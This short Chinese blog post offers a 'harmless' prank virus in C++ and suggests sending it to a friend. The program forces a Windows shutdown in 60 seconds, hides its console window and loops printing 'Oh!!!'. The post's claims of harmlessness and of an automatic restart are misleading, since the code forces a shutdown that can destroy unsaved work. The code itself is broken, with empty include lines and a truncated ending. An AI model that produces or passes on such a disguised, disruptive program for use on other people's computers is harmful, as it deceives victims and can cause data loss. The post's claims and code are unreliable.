一个简单实用的病毒小代码(对电脑无害)

建议发给你最好的朋友,有助于促进友谊

用C++编译

破解方法:等待一分钟,电脑会自动重启

#include
#include
using namespace std;
int main()
{
    system("Shutdown -s -t 60");
    HWND hwnd;
    hwnd=FindWindow("ConsoleWindowClass",NULL);
    if(hwnd) ShowWindow(hwnd,SW_HIDE);
	int x=GetSystemMetrics(SM_CXSCREEN);
	int y=GetSystemMetrics(SM_CYSCREEN);
	srand(time(0));
	while(1)cout<<"Oh!!!"<

你可能感兴趣的:(c++)